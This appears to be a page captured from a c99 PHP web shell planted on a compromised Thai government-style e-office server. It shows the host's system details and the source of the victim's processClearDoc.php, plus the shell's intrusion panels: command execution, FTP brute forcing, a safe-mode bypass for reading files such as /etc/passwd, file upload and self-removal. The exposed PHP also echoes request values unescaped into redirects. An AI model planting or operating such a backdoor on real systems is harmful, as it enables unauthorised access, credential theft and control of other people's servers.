!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processClearDoc.php (2.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
set_time_limit
(0);
include_once(
"../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocuments.php";
include_once 
"funct.php";
include_once 
"../class/clsDepartment.php";
 include_once 
"../class/clsDocLineConfig.php";
 include_once 
"../class/clsDocLinePosition.php";
 include_once 
"../class/clsPerson.php";
 include_once 
"../link/keyThai.php";
 include_once 
"getPrefix.php";
 include_once 
"../class/clsDocReceiveSend.php";
 include_once 
"../class/clsClearDocEntry.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDt = new doctype($oC);
$oDoc = new Documents($oC);    //
$oDoc2 = new Documents($oC);    //

$oDP = new Department($oC);
$oDP1 = new Department($oC);
$oDP1 = new Department($oC);
$oDlc1 = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oPS = new person($oC);
$oRs = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oCde = new ClearDocEntry($oC);

    if(
th2a($yearDoc) == 0){
        list(
$dd$mm$yy) = preg_split('[/]',$start);
        
$startT=($yy+543)."-".$mm."-".$dd;
        list(
$dd$mm$yy) = preg_split('[/]',$end);
        
$endT=($yy+543)."-".$mm."-".$dd;
    }else{
        
$yy th2a($yearDoc);
        
$startT $yy."-01-01";
        
$endT $yy."-12-31";
    }
    
//echo $personId.'-'.$startT.'--'.$endT;
//-------searchCountDocUnread
        //echo '1<br>';
        
$oRs->searchDocUnread_Update($personId,$startT,$endT,'Y');
//-------searchCountDocRead
        //echo '2<br>';
        
$oRs2->searchDocRead_Update($personId,$startT,$endT,'Y');
//--------searchCountUnReceiveDoc
        //echo '3<br>';
        
$oRs3->searchUnReceiveDoc_Update($personId,$startT,$endT,'Y');
                

        
$oCde->AddNew();
        
$oCde->CdID=$oCde->GetNextCode();
        
//echo 'CdID---'.$oCde->CdID;
        
$oCde->personIdClear=$showpersonId;
        
//echo '<br>personIdClear---'.$showpersonId;
        
$oCde->personIdDoc=$personId;
        
//echo '<br>personIdDoc---'.$personId;
        
$oCde->ClearDate=getNowDateTh()." ".date('H:i:s');
        
//echo '<br>ClearDate---'.$oCde->ClearDate;
        
$oCde->DocRefClearDoc=$DocRefClearDoc;
        
//echo '<br>ClearDate---'.$DocRefClearDoc;
        
$oCde->Save();

if(
$checkAll!=1){
?>
        <script language="JavaScript">
        window.location.href="printRepCheckDocPerson.php?start=<? echo $start?>&end=<? echo $end?>&yearDoc=<? echo $yearDoc?>&deptId=<? echo $deptId?>&groupps=<? echo $groupps?>&showpersonId=<? echo $showpersonId;?>";
        </script>
<?
}else{
?>
        <script language="JavaScript">
    window.location.href="printRepCheckAllDocPerson.php?start=<? echo $start?>&end=<? echo $end?>&yearDoc=<? echo $yearDoc?>&groupps=<? echo $groupps?>&showpersonId=<? echo $showpersonId;?>";
        </script>
<? }?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--